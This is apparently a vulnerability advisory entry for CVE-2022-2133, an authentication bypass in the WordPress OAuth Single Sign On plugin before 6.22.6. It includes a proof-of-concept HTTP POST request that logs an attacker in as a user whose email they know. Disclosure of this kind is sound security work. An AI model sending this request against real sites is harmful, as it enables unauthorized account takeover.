Lucene search
Lana CodesWPEX-ID:E76939CA-180F-4472-A26A-E0C36CFD32DEHistoryJun 27, 2022 - 12:00 a.m.
OAuth Single Sign On < 6.22.6 - Authentication Bypass
2022-06-2700:00:00
Lana Codes
288
0.001 Low
EPSS
Percentile
40.2%
The plugin doesn’t validate that OAuth access token requests are legitimate, which allows attackers to log onto the site with the only knowledge of a user’s email address.
POST / HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Connection: close
option=mooauth&[email protected]Related
wpvulndb
wpvulndb
OAuth Single Sign On < 6.22.6 - Authentication Bypass
2022-06-27 00:00:00
cvelist
cvelist
CVE-2022-2133 OAuth Single Sign On < 6.22.6 - Authentication Bypass
2022-07-17 10:36:17
prion
prion
Design/Logic Flaw
2022-07-17 11:15:00
nvd
nvd
CVE-2022-2133
2022-07-17 11:15:08
cnvd
cnvd
WordPress OAuth Single Sign On plugin授权问题漏洞
2022-07-19 00:00:00
cve
cve
CVE-2022-2133
2022-07-17 11:15:08
patchstack
patchstack